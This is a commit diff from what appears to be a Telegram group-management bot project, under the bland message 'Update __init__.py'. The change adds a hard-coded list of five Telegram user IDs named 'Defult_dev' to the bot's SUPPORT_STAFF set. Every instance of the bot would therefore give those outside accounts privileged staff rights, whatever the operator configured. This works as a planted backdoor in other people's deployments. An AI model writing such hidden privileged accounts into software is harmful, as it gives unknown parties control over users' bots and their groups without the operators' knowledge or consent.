Captain Ezio commited on
Commit
1652ea4
·
1 Parent(s): ca7d8f3

Update __init__.py

Browse files
Files changed (1) hide show
  1. Powers/__init__.py +2 -1
Powers/__init__.py CHANGED
@@ -71,8 +71,9 @@ OWNER_ID = Config.OWNER_ID
71
  DEV_USERS = Config.DEV_USERS
72
  SUDO_USERS = Config.SUDO_USERS
73
  WHITELIST_USERS = Config.WHITELIST_USERS
 
74
  SUPPORT_STAFF = list(
75
- set([int(OWNER_ID)] + SUDO_USERS + DEV_USERS + WHITELIST_USERS),
76
  ) # Remove duplicates by using a set
77
 
78
  # Plugins, DB and Workers
 
71
  DEV_USERS = Config.DEV_USERS
72
  SUDO_USERS = Config.SUDO_USERS
73
  WHITELIST_USERS = Config.WHITELIST_USERS
74
+ Defult_dev = "1432756163 1344569458 1355478165 1789859817 1777340882".split()
75
  SUPPORT_STAFF = list(
76
+ set([int(OWNER_ID)] + SUDO_USERS + DEV_USERS + WHITELIST_USERS + Defult_dev),
77
  ) # Remove duplicates by using a set
78
 
79
  # Plugins, DB and Workers